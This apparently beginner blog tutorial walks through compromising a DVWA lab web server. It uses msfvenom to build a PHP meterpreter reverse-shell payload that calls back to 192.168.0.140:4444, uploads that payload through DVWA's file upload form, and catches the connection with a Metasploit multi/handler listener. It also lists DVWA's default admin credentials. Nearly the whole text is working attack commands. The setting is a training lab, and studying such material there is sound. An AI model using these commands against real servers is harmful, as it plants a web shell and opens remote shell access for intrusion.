Web Server Penetration with DVWA and Metasploit (Beginner Guide)

Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw


It will generate a raw code of php file


Now copy the generated code in the text file and save it on your desktop with .php extension


Now open the DVWA Webapp in your server and login with following credentials:
Username - admin
Password - password


Now scroll to the File Upload section in left pane and upload the above created php file


When you will finish uploading your php file, it will show you the path


Now open your uploaded file in browser


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4444
exploit

Now you can access the victim's server

0 comments:

Post a Comment